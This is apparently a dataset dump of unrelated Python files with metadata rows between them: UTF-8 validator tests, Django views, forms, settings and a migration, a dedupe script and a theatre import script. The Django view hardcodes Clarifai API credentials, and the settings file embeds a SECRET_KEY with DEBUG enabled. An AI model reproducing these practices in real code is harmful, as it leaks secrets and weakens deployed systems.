Reset validator to start new incremental UTF-8 decode/validation.
"""
self.state = Utf8Validator.UTF8_ACCEPT
self.codepoint = 0
self.i = 0
def validate(self, ba):
"""
Incrementally validate a chunk of bytes provided as bytearray.
Will return a quad (valid?, endsOnCodePoint?, currentIndex, totalIndex).
As soon as an octet is encountered which renders the octet sequence
invalid, a quad with valid? == False is returned. currentIndex returns
the index within the currently consumed chunk, and totalIndex the
index within the total consumed sequence that was the point of bail out.
When valid? == True, currentIndex will be len(ba) and totalIndex the
total amount of consumed bytes.
"""
l = len(ba)
for i in xrange(0, l):
## optimized version of decode(), since we are not interested in actual code points
self.state = Utf8Validator.UTF8VALIDATOR_DFA[256 + (self.state << 4) + Utf8Validator.UTF8VALIDATOR_DFA[ba[i]]]
if self.state == Utf8Validator.UTF8_REJECT:
self.i += i
return False, False, i, self.i
self.i += l
return True, self.state == Utf8Validator.UTF8_ACCEPT, l, self.i
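# Minimal usage sketch (illustrative, not from the original docs): u'\u00b5'
# encodes to the two octets '\xc2\xb5'; fed in two chunks, the validator keeps
# its DFA state across calls, so the second chunk completes the code point.
def _example_incremental_use():
    v = Utf8Validator()
    assert v.validate(bytearray('\xc2')) == (True, False, 1, 1)  # valid so far, mid code point
    assert v.validate(bytearray('\xb5')) == (True, True, 1, 2)   # code point completed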
UTF8_TEST_SEQUENCES = []
def setTestSequences():
"""
Setup test sequences for UTF-8 decoder tests from
http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
"""
# 1 Some correct UTF-8 text
vss = '\xce\xba\xe1\xbd\xb9\xcf\x83\xce\xbc\xce\xb5'
vs = ["Some valid UTF-8 sequences", []]
vs[1].append((True, vss))
UTF8_TEST_SEQUENCES.append(vs)
# All prefixes of correct UTF-8 text
vs = ["All prefixes of a valid UTF-8 string that contains multi-byte code points", []]
v = Utf8Validator()
for i in xrange(1, len(vss) + 1):
v.reset()
res = v.validate(bytearray(vss[:i]))
vs[1].append((res[0] and res[1], vss[:i]))
UTF8_TEST_SEQUENCES.append(vs)
# 2.1 First possible sequence of a certain length
vs = ["First possible sequence of a certain length", []]
vs[1].append((True, '\x00'))
vs[1].append((True, '\xc2\x80'))
vs[1].append((True, '\xe0\xa0\x80'))
vs[1].append((True, '\xf0\x90\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# the following conform to the UTF-8 integer encoding scheme, but
# valid UTF-8 only allows for Unicode code points up to U+10FFFF
vs = ["First possible sequence length 5/6 (invalid codepoints)", []]
vs[1].append((False, '\xf8\x88\x80\x80\x80'))
vs[1].append((False, '\xfc\x84\x80\x80\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# 2.2 Last possible sequence of a certain length
vs = ["Last possible sequence of a certain length", []]
vs[1].append((True, '\x7f'))
vs[1].append((True, '\xdf\xbf'))
vs[1].append((True, '\xef\xbf\xbf'))
vs[1].append((True, '\xf4\x8f\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# the following conform to the UTF-8 integer encoding scheme, but
# valid UTF-8 only allows for Unicode code points up to U+10FFFF
vs = ["Last possible sequence length 4/5/6 (invalid codepoints)", []]
vs[1].append((False, '\xf7\xbf\xbf\xbf'))
vs[1].append((False, '\xfb\xbf\xbf\xbf\xbf'))
vs[1].append((False, '\xfd\xbf\xbf\xbf\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 2.3 Other boundary conditions
vs = ["Other boundary conditions", []]
vs[1].append((True, '\xed\x9f\xbf'))
vs[1].append((True, '\xee\x80\x80'))
vs[1].append((True, '\xef\xbf\xbd'))
vs[1].append((True, '\xf4\x8f\xbf\xbf'))
vs[1].append((False, '\xf4\x90\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# 3.1 Unexpected continuation bytes
vs = ["Unexpected continuation bytes", []]
vs[1].append((False, '\x80'))
vs[1].append((False, '\xbf'))
vs[1].append((False, '\x80\xbf'))
vs[1].append((False, '\x80\xbf\x80'))
vs[1].append((False, '\x80\xbf\x80\xbf'))
vs[1].append((False, '\x80\xbf\x80\xbf\x80'))
vs[1].append((False, '\x80\xbf\x80\xbf\x80\xbf'))
s = ""
for i in xrange(0x80, 0xbf):
s += chr(i)
vs[1].append((False, s))
UTF8_TEST_SEQUENCES.append(vs)
# 3.2 Lonely start characters
vs = ["Lonely start characters", []]
m = [(0xc0, 0xdf), (0xe0, 0xef), (0xf0, 0xf7), (0xf8, 0xfb), (0xfc, 0xfd)]
for mm in m:
s = ''
for i in xrange(mm[0], mm[1]):
s += chr(i)
s += chr(0x20)
vs[1].append((False, s))
UTF8_TEST_SEQUENCES.append(vs)
# 3.3 Sequences with last continuation byte missing
vs = ["Sequences with last continuation byte missing", []]
k = ['\xc0', '\xe0\x80', '\xf0\x80\x80', '\xf8\x80\x80\x80', '\xfc\x80\x80\x80\x80',
'\xdf', '\xef\xbf', '\xf7\xbf\xbf', '\xfb\xbf\xbf\xbf', '\xfd\xbf\xbf\xbf\xbf']
for kk in k:
vs[1].append((False, kk))
UTF8_TEST_SEQUENCES.append(vs)
# 3.4 Concatenation of incomplete sequences
vs = ["Concatenation of incomplete sequences", []]
vs[1].append((False, ''.join(k)))
UTF8_TEST_SEQUENCES.append(vs)
# 3.5 Impossible bytes
vs = ["Impossible bytes", []]
vs[1].append((False, '\xfe'))
vs[1].append((False, '\xff'))
vs[1].append((False, '\xfe\xfe\xff\xff'))
UTF8_TEST_SEQUENCES.append(vs)
# 4.1 Examples of an overlong ASCII character
vs = ["Examples of an overlong ASCII character", []]
vs[1].append((False, '\xc0\xaf'))
vs[1].append((False, '\xe0\x80\xaf'))
vs[1].append((False, '\xf0\x80\x80\xaf'))
vs[1].append((False, '\xf8\x80\x80\x80\xaf'))
vs[1].append((False, '\xfc\x80\x80\x80\x80\xaf'))
UTF8_TEST_SEQUENCES.append(vs)
# 4.2 Maximum overlong sequences
vs = ["Maximum overlong sequences", []]
vs[1].append((False, '\xc1\xbf'))
vs[1].append((False, '\xe0\x9f\xbf'))
vs[1].append((False, '\xf0\x8f\xbf\xbf'))
vs[1].append((False, '\xf8\x87\xbf\xbf\xbf'))
vs[1].append((False, '\xfc\x83\xbf\xbf\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 4.3 Overlong representation of the NUL character
vs = ["Overlong representation of the NUL character", []]
vs[1].append((False, '\xc0\x80'))
vs[1].append((False, '\xe0\x80\x80'))
vs[1].append((False, '\xf0\x80\x80\x80'))
vs[1].append((False, '\xf8\x80\x80\x80\x80'))
vs[1].append((False, '\xfc\x80\x80\x80\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# 5.1 Single UTF-16 surrogates
vs = ["Single UTF-16 surrogates", []]
vs[1].append((False, '\xed\xa0\x80'))
vs[1].append((False, '\xed\xad\xbf'))
vs[1].append((False, '\xed\xae\x80'))
vs[1].append((False, '\xed\xaf\xbf'))
vs[1].append((False, '\xed\xb0\x80'))
vs[1].append((False, '\xed\xbe\x80'))
vs[1].append((False, '\xed\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 5.2 Paired UTF-16 surrogates
vs = ["Paired UTF-16 surrogates", []]
vs[1].append((False, '\xed\xa0\x80\xed\xb0\x80'))
vs[1].append((False, '\xed\xa0\x80\xed\xbf\xbf'))
vs[1].append((False, '\xed\xad\xbf\xed\xb0\x80'))
vs[1].append((False, '\xed\xad\xbf\xed\xbf\xbf'))
vs[1].append((False, '\xed\xae\x80\xed\xb0\x80'))
vs[1].append((False, '\xed\xae\x80\xed\xbf\xbf'))
vs[1].append((False, '\xed\xaf\xbf\xed\xb0\x80'))
vs[1].append((False, '\xed\xaf\xbf\xed\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 5.3 Other illegal code positions
# Those are non-character code points and valid UTF-8 by RFC 3629
vs = ["Non-character code points (valid UTF-8)", []]
vs[1].append((True, '\xef\xbf\xbe'))
vs[1].append((True, '\xef\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# Unicode replacement character
vs = ["Unicode replacement character", []]
vs[1].append((True, '\xef\xbf\xbd'))
UTF8_TEST_SEQUENCES.append(vs)
setTestSequences()
def test_utf8():
"""
These tests verify the UTF-8 decoder/validator on the various test cases from
http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
"""
v = Utf8Validator()
vs = []
for k in UTF8_TEST_SEQUENCES:
vs.extend(k[1])
# All Unicode code points
    for i in xrange(0, 0xffff): # should be 0x10ffff, but a non-wide Python build is limited to 16 bits

if i < 0xD800 or i > 0xDFFF: # filter surrogate code points, which are disallowed to encode in UTF-8
vs.append((True, unichr(i).encode("utf-8")))
# 5.1 Single UTF-16 surrogates
for i in xrange(0xD800, 0xDBFF): # high-surrogate
ss = unichr(i).encode("utf-8")
vs.append((False, ss))
for i in xrange(0xDC00, 0xDFFF): # low-surrogate
ss = unichr(i).encode("utf-8")
vs.append((False, ss))
# 5.2 Paired UTF-16 surrogates
for i in xrange(0xD800, 0xDBFF): # high-surrogate
for j in xrange(0xDC00, 0xDFFF): # low-surrogate
ss1 = unichr(i).encode("utf-8")
ss2 = unichr(j).encode("utf-8")
vs.append((False, ss1 + ss2))
vs.append((False, ss2 + ss1))
# now test and assert ..
for s in vs:
v.reset()
r = v.validate(bytearray(s[1]))
res = r[0] and r[1] # no UTF-8 decode error and everything consumed
assert res == s[0]
def test_utf8_incremental():
"""
These tests verify that the UTF-8 decoder/validator can operate incrementally.
"""
v = Utf8Validator()
v.reset()
assert (True, True, 15, 15) == v.validate(bytearray("µ@ßöäüàá"))
v.reset()
assert (False, False, 0, 0) == v.validate(bytearray([0xF5]))
## the following 3 all fail on eating byte 7 (0xA0)
v.reset()
assert (True, True, 6, 6) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74, 0x65, 0x64]))
assert (False, False, 1, 7) == v.validate(bytearray([0xED, 0xA0, 0x80]))
v.reset()
assert (True, True, 4, 4) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74]))
assert (False, False, 3, 7) == v.validate(bytearray([0x65, 0x64, 0xED, 0xA0, 0x80]))
v.reset()
assert (True, False, 7, 7) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74, 0x65, 0x64, 0xED]))
assert (False, False, 0, 7) == v.validate(bytearray([0xA0, 0x80]))
if __name__ == '__main__':
"""
Run unit tests.
"""
test_utf8_incremental()
test_utf8()
|
[
"gdur.mugen@googlemail.com"
] |
gdur.mugen@googlemail.com
|
c0b9fba0df580154ea29be2dc724cbe802318450
|
b8120b9a99b1aab3fa423bc28173b10523084301
|
/app/views.py
|
3980e892431891877c72c44e2da6ae5298a24185
|
[] |
no_license
|
Trailblazerr1/iiita-hacks-musify
|
e0cc22a95b164399462750e5667b886090ca17bb
|
d7ab39622306e48e280fb350b9f416b64dc95f37
|
refs/heads/master
| 2020-12-25T14:38:34.028923
| 2016-09-12T11:28:49
| 2016-09-12T11:28:49
| 67,906,279
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,195
|
py
|
"""
Definition of views.
"""
from django.shortcuts import render
from django.http import HttpRequest
from django.template import RequestContext
from datetime import datetime
from app.forms import PostForm
from django.http import HttpResponseRedirect
from clarifai.client import ClarifaiApi
import requests
import json
import gensim
import os.path
BASE = os.path.dirname(os.path.abspath(__file__))
word_model = gensim.models.Word2Vec.load_word2vec_format(os.path.join(BASE, 'vectors.bin'),binary=True)
genres = ['abstract', 'accordion', 'afrikaans', 'afrobeat', 'ambient', 'andean', 'anime', 'axe', 'balearic', 'banda', 'bangla', 'barbershop', 'baroque', 'bassline', 'bebop', 'bemani', 'bhangra', 'bluegrass', 'blues', 'bolero', 'boogaloo', 'bounce', 'breakbeat', 'breaks', 'britpop', 'broadway', 'byzantine', 'cabaret', 'cajun', 'calypso', 'cantopop', 'capoeira', 'carnatic', 'ccm', 'cello', 'celtic', 'chanson', 'choral', 'choro', 'christmas', 'clarinet', 'classical', 'comedy', 'comic', 'commons', 'consort', 'corrosion', 'country', 'dancehall', 'demoscene', 'desi', 'didgeridoo', 'disco', 'dixieland', 'downtempo', 'drama', 'drone', 'dub', 'ebm', 'edm', 'electro', 'electronic', 'electronica', 'emo', 'environmental', 'eurovision', 'exotica', 'experimental', 'fado', 'fake', 'filmi', 'flamenco', 'folk', 'footwork', 'freestyle', 'funk', 'gabba', 'galego', 'gamelan', 'glitch', 'gospel', 'grime', 'grindcore', 'grunge', 'guidance', 'hardcore', 'harp', 'hawaiian', 'healing', 'hollywood', 'house', 'idol', 'industrial', 'jazz', 'jerk', 'judaica', 'juggalo', 'jungle', 'klezmer', 'latin', 'lds', 'lilith', 'liturgical', 'lounge', 'lowercase', 'maghreb', 'magyar', 'mallet', 'mambo', 'medieval', 'meditation', 'melancholia', 'merengue', 'metal', 'metalcore', 'minimal', 'mizrahi', 'monastic', 'morna', 'motivation', 'motown', 'neoclassical', 'nepali', 'neurofunk', 'ninja', 'noise', 'nursery', 'oi', 'opera', 'oratory', 'orchestral', 'outsider']
def home(request):
return render(request, 'app/home.html')
def Developers(request):
return render(request, 'app/Developers.html')
def playlist(request):
assert isinstance(request, HttpRequest)
if request.method == 'GET':
form = PostForm()
else:
form = PostForm(request.POST) # Bind data from request.POST into a PostForm
if form.is_valid():
imgURL = form.cleaned_data['content']
app_id = "DbZ4NzfrPL-K_CHHf4y4srnvBUSgMo4Dz9BIbeXt"
app_secret = "crjTy-8St_kiFkL0wZZCFyrcoWJyOdets8Fa1BNi"
clarifai_api = ClarifaiApi(app_id,app_secret)
tags = ''
embedLink = ''
try:
result = clarifai_api.tag_image_urls(imgURL)
except: #if url is invalid based on clarifai API call
tags = 'invalid url'
imgURL = ''
if tags!='invalid url':
tagList = result['results'][0]['result']['tag']['classes']
bestGenre = imgscore(tagList,genres)
r = requests.get('https://api.spotify.com/v1/search?q=%22'+bestGenre+'%22&type=playlist')
jsonStuff = r.json()
uri = jsonStuff['playlists']['items'][0]['uri']
embedLink = "https://embed.spotify.com/?uri="+uri
return render(
request,
'app/playlist.html',
{
'form': form,
'imgsrc': imgURL,
'debugText': tags,
'playlistURI': embedLink,
'year':datetime.now().year,
}
)
return render(
request,
'app/playlist.html',
{
'form': form,
'imgsrc': '',
'debugText': '',
'playlistURI': '',
'year':datetime.now().year,
}
)
def imgscore(words, genres):
    """Return the genre whose summed word2vec similarity to the image tags is highest."""
    summ = []
    for genre in genres:
        l = 0.0
        for word in words:
            try:
                l += word_model.similarity(genre, word)
            except KeyError:  # tag or genre missing from the word2vec vocabulary
                pass
        summ.append(l)
    return genres[summ.index(max(summ))]
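# The same selection rule with the similarity function injected, so it can be
# exercised without the word2vec model (a sketch; `sim` is any hypothetical
# callable returning a similarity score for two words):
def pick_genre(sim, words, genres):
    totals = [sum(sim(g, w) for w in words) for g in genres]
    return genres[totals.index(max(totals))]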
|
[
"noreply@github.com"
] |
Trailblazerr1.noreply@github.com
|
f1fb0b7965ea4496faa19f2a337c9563b82ab413
|
d12fe2658edc0db98b278aab507fc86efefd5541
|
/chat/forms.py
|
0d23f6da0892f36ce4d4af4442b0a0e72db168f1
|
[] |
no_license
|
harumi-matsumoto/django-ai-chatbot
|
6190c1090e8aea877ff7573c45421e10158e4a64
|
90e2b8e8cec98c022892e8603eb090fc64197b3f
|
refs/heads/master
| 2020-08-05T16:10:09.162039
| 2019-10-12T03:10:54
| 2019-10-12T03:10:54
| 212,608,451
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
from django import forms
class TestPredictForm(forms.Form):
message = forms.CharField(widget=forms.Textarea, max_length=255)
|
[
"harumimatsumoto27@gmail.com"
] |
harumimatsumoto27@gmail.com
|
a382122e088d085ebf613ab22954c0a051260e01
|
332e0fe0e109795a838ab75f91cacbd818eb8f26
|
/examples/tech_locator.py
|
430a9d69cc57fcef52eece431039f3d98c927476
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
yoyossy/open-city__dedupe
|
08fb505dda14992cd35fd41c0ff5c5fb98d54d68
|
187d0d6eeeba23046d7155fb9e593b36e21388fe
|
refs/heads/master
| 2021-01-15T19:22:36.191934
| 2012-07-23T14:48:39
| 2012-07-23T14:48:39
| 5,244,938
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,104
|
py
|
import csv
import re
import os
#dedupe modules
from dedupe.training_sample import activeLearning, consoleLabel
from dedupe.blocking import trainBlocking, blockingIndex, mergeBlocks
from dedupe.predicates import *
import dedupe.core
import dedupe.clustering
from dedupe import core, clustering  # the script below refers to core.* and clustering.*
def techLocatorImport(filename) :
data_d = {}
duplicates_d = {}
with open(filename) as f :
reader = csv.reader(f, delimiter=',', quotechar='"')
header = reader.next()
for i, row in enumerate(reader) :
instance = {}
for j, col in enumerate(row) :
col = re.sub(' +', ' ', col)
col = re.sub('\n', ' ', col)
instance[header[j]] = col.strip().strip('"').strip("'").lower()
data_d[i] = dedupe.core.frozendict(instance)
return(data_d, header)
def dataModel() :
return {'fields':
{ 'OrganizationName' : {'type': 'String', 'weight' : 0},
'Address' : {'type': 'String', 'weight' : 0},
'ZipCode' : {'type': 'String', 'weight' : 0},
'OrgPhone' : {'type': 'String', 'weight' : 0}
},
'bias' : 0}
def init(inputFile) :
data_d, header = techLocatorImport(inputFile)
data_model = dataModel()
return (data_d, data_model, header)
# user defined function to label pairs as duplicates or non-duplicates
def dictSubset(d, keys) :
return dict((k,d[k]) for k in keys if k in d)
inputFile = "datasets/Tech Locator Master List.csv"
num_training_dupes = 200
num_training_distinct = 16000
numIterations = 100
numTrainingPairs = 30
import time
t0 = time.time()
data_d, data_model, header = init(inputFile)
print "importing data ..."
if os.path.exists('learned_settings.json') :
data_model, predicates = core.readSettings('learned_settings.json')
else:
#lets do some active learning here
training_data, training_pairs, data_model = activeLearning(data_d, data_model, consoleLabel, numTrainingPairs)
predicates = trainBlocking(training_pairs,
(wholeFieldPredicate,
tokenFieldPredicate,
commonIntegerPredicate,
sameThreeCharStartPredicate,
sameFiveCharStartPredicate,
sameSevenCharStartPredicate,
nearIntegersPredicate,
commonFourGram,
commonSixGram),
data_model, 1, 1)
core.writeSettings('learned_settings.json',
data_model,
predicates)
blocked_data = blockingIndex(data_d, predicates)
candidates = mergeBlocks(blocked_data)
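# Blocking sidesteps the full pairwise comparison count of 0.5 * n**2; the
# percentage printed below is 100 * (1 - len(candidates) / (0.5 * len(data_d)**2)).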
print ""
print "Blocking reduced the number of comparisons by",
print int((1-len(candidates)/float(0.5*len(data_d)**2))*100),
print "%"
print "We'll make",
print len(candidates),
print "comparisons."
print "Learned Weights"
for k1, v1 in data_model.items() :
try:
for k2, v2 in v1.items() :
print (k2, v2['weight'])
except :
print (k1, v1)
print ""
print "finding duplicates ..."
print ""
dupes = core.scoreDuplicates(candidates, data_d, data_model, .5)
clustered_dupes = clustering.cluster(dupes, estimated_dupe_fraction = 0.4)
print "# duplicate sets"
print len(clustered_dupes)
orig_data = {}
with open(inputFile) as f :
reader = csv.reader(f)
reader.next()
for row_id, row in enumerate(reader) :
orig_data[row_id] = row
with open("output/TL_dupes_list_" + str(time.time()) + ".csv","w") as f :
writer = csv.writer(f)
heading_row = header
heading_row.insert(0, "Group_ID")
writer.writerow(heading_row)
dupe_id_list = []
for group_id, cluster in enumerate(clustered_dupes, 1) :
for candidate in sorted(cluster) :
dupe_id_list.append(candidate)
row = orig_data[candidate]
row.insert(0, group_id)
writer.writerow(row)
for id in orig_data :
if not id in set(dupe_id_list) :
row = orig_data[id]
row.insert(0, 'x')
writer.writerow(row)
print "ran in ", time.time() - t0, "seconds"
|
[
"derek.eder@gmail.com"
] |
derek.eder@gmail.com
|
37886a99293824da426248ef167d6469762d4331
|
48d17885eda6401cde7e4ef563727ad4b5a7e851
|
/ex43_classes.py
|
18549bd62a8d355389e39399f65761f4a307dcb6
|
[] |
no_license
|
bowen0701/learn-python-the-hard-way
|
635680d711dca044e2584ffe7dc3b129998f59db
|
73540c462cf1561271664d2058e902d60907c200
|
refs/heads/master
| 2021-09-22T11:01:35.059384
| 2018-09-08T23:30:38
| 2018-09-08T23:30:38
| 94,005,892
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 760
|
py
|
"""Basic Object-Oriented Anaysis and Design."""
class Scene(object):
def enter(self):
pass
class Engine(object):
def __init__(self, scene_map):
pass
def play(self):
pass
class Death(Scene):
def enter(self):
pass
class CentralCorridor(Scene):
def enter(self):
pass
class LaserWeaponArmory(Scene):
def enter(self):
pass
class TheBridge(Scene):
def enter(self):
pass
class EscapePod(Scene):
def enter(self):
pass
class Map(object):
def __init__(self, start_scene):
pass
def next_scene(self, scene_name):
pass
def opening_scene(self):
pass
a_map = Map('central_corridor')
a_game = Engine(a_map)
a_game.play()
|
[
"bowen0701@gmail.com"
] |
bowen0701@gmail.com
|
de7ede51aae8aea701206a53f518f0d5ac082ce5
|
0090d4ab68de301b77c6c69a58464136fa04ba49
|
/trydjango/settings.py
|
a3933049574711d35e99e5e238ad8b94b8ac109f
|
[] |
no_license
|
firdavsDev/Django_simple_blog
|
b70000194875d792838f916d035b89be59312cd9
|
f5999cf30091fce2246f44a5a55d55071aeb7a99
|
refs/heads/main
| 2023-08-23T04:10:52.570457
| 2021-09-23T10:19:18
| 2021-09-23T10:19:18
| 409,543,186
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,905
|
py
|
"""
Django settings for trydjango project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent # keeps track of where these project files live
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-jod$glnf4*4&(_812i50)fb(9weaytnic1#!!*-5m42@jmbof*' # every Django project has its own special secret key
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True # if the site runs into any problem, the error report is surfaced to us
ALLOWED_HOSTS = []
# Application definition
# apps inside the site must be registered here
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
    # our own apps are added here
'products',
'pages',
'blog',
]
# many of our requests can be made secure through these middleware
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
# this path works like an <a href>
ROOT_URLCONF = 'trydjango.urls'
import os
# our HTML files are registered from here
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # we point this at our HTML code (the template directory)
'DIRS': [os.path.join(BASE_DIR,"templates") ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'trydjango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
# the database, SQLite by default
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
# for images, CSS and JS files
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"74819987+firdavsDev@users.noreply.github.com"
] |
74819987+firdavsDev@users.noreply.github.com
|
f373e27e3ba576b9f7a22bbc7276a5e8c633bcb2
|
e65ac1ea21eee50e7b5b5d5f8e0d8ceea2cb1c9a
|
/import/its-behind-you/import.py
|
559133b57b5a5d8d7ca57d4823458c831c88daf3
|
[] |
no_license
|
dracos/Theatricalia
|
539b42746dea86c0377db2593ba651e3563c1579
|
8cb417f5048a261329bc853bfcc6ba64c76daec8
|
refs/heads/master
| 2023-02-19T18:56:56.751263
| 2023-02-15T21:39:40
| 2023-02-15T22:13:42
| 1,178,517
| 5
| 2
| null | 2021-01-06T14:38:26
| 2010-12-17T23:02:50
|
Python
|
UTF-8
|
Python
| false
| false
| 2,718
|
py
|
#!/usr/bin/python
import os, sys, re, time
for i in range(3, 0, -1):
sys.path.append('../' * i)
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from django.core.files.base import ContentFile
from plays.models import Play
from productions.models import Production, Part, ProductionCompany
from productions.models import Place as ProductionPlace
from people.models import Person
from photos.models import Photo
from functions import *
from plays2009 import *
real_run()
for venue in theatres:
if "," in venue:
name, town = venue.rsplit(',', 1)
location = add_theatre(name, town)
else:
location = add_theatre(venue)
theatres[venue] = location
for production in plays:
title = production['title']
log("Production of %s" % title)
play = add_play(title, force_insert=True)
company = None
producer = production['producer']
if producer:
if dry_run():
company = ProductionCompany(name=producer)
else:
company, created = ProductionCompany.objects.get_or_create(name=producer)
description = production['description']
source = '<a href="%s">its-behind-you.com</a>' % production['source']
production_obj = Production(
play = play,
company = company,
description = description,
source = source,
)
if not dry_run():
production_obj.save()
if production['titleImg']:
add_photo(production['titleImg'], production_obj, 'Title')
for p in production['pictures']:
add_photo(p, production_obj, 'Handbill')
dates = production['dates']
for d in dates:
start_date, end_date = d[0]
place = d[1]
location = theatres[place]
log(' %s %s %s' % (start_date, end_date, location))
if not dry_run():
ProductionPlace.objects.get_or_create(production=production_obj, place=location, start_date=start_date, end_date=end_date)
cast = production['cast']
for name in cast:
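        # the greedy first group splits on the *last* space,
        # e.g. "Sarah Jane Smith" -> ("Sarah Jane", "Smith")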
m = re.match('(.*) (.*?)$', name)
if m:
first_name, last_name = m.group(1), m.group(2)
else:
first_name, last_name = u'', name
log(' Actor: ' + first_name + ' ' + last_name)
if not dry_run():
try:
person, created = Person.objects.get_or_create(first_name=first_name, last_name=last_name)
except:
person = Person(first_name=first_name, last_name=last_name)
person.save()
Part.objects.get_or_create(production=production_obj, person=person, cast=True)
if name in castLinks:
person.web = castLinks[name]
person.save()
|
[
"matthew@theatricalia.com"
] |
matthew@theatricalia.com
|
0733674fe504df151b23c469f99ef7d29df5489a
|
ac7828a5fb10daaba998a09b427de3076d3b06d8
|
/cnems/bbc/migrations/0011_comments.py
|
6f9bdeacd4e9f87e4b20563d4d02dab42fdb6293
|
[] |
no_license
|
zkq123/django_1
|
950b1e8b4f94542e78e17de2744d212a7ac00ac9
|
9c5b498f7314ad9283da32b4a0e3793674bb7a7f
|
refs/heads/master
| 2022-11-07T02:12:33.318288
| 2018-12-08T02:26:19
| 2018-12-08T02:26:19
| 155,974,478
| 0
| 1
| null | 2022-10-07T22:55:44
| 2018-11-03T10:55:35
|
Python
|
UTF-8
|
Python
| false
| false
| 765
|
py
|
# Generated by Django 2.1.2 on 2018-12-04 12:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('bbc', '0010_remove_likes_sum'),
]
operations = [
migrations.CreateModel(
name='Comments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment_center', models.CharField(max_length=200)),
('news', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bbc.News')),
('users', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bbc.Users')),
],
),
]
|
[
"qingyun@email.com"
] |
qingyun@email.com
|
266486163cb2f2c144efffc3cfa02050697431de
|
d7de23e521d73096f173318423cf6b0e5d06c97f
|
/CMGTools/LEP3/python/kinfitters.py
|
2721d051ec15e98ffabeebf5f9689b3c2383578a
|
[] |
no_license
|
HemantAHK/CMG
|
3cf6c047b193e463e3632aa728cd49067e9dde76
|
7bec46d27e491397c4e13a52b34cf414a692d867
|
refs/heads/master
| 2021-05-29T20:01:04.390627
| 2013-08-15T15:24:22
| 2013-08-15T15:24:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
from CMGTools.RootTools.RootTools import *
from ROOT import gSystem
gSystem.Load("libCMGToolsLEP3")
from ROOT import FourJetEpKinFitter
from ROOT import FourJetEpMKinFitter
from ROOT import DiJetMKinFitter
|
[
""
] | |
56bfee5ce1520cf5059f5913eee9d2238b793119
|
eda3d6974a60a42a1ee35cd2327218029490a654
|
/develop/sanic_aiozipkin_test.py
|
9433fc32d133111cb645f42c7070691073e2669f
|
[] |
no_license
|
1260228859/EvanKao-ms
|
4a4159123bfd3f3b960c9b81ca920f599fffc6cc
|
ae0e9dbf2803c6bd67ea8b0be012b64c57db7bbc
|
refs/heads/master
| 2020-09-26T19:39:48.587556
| 2020-07-08T03:00:01
| 2020-07-08T03:00:01
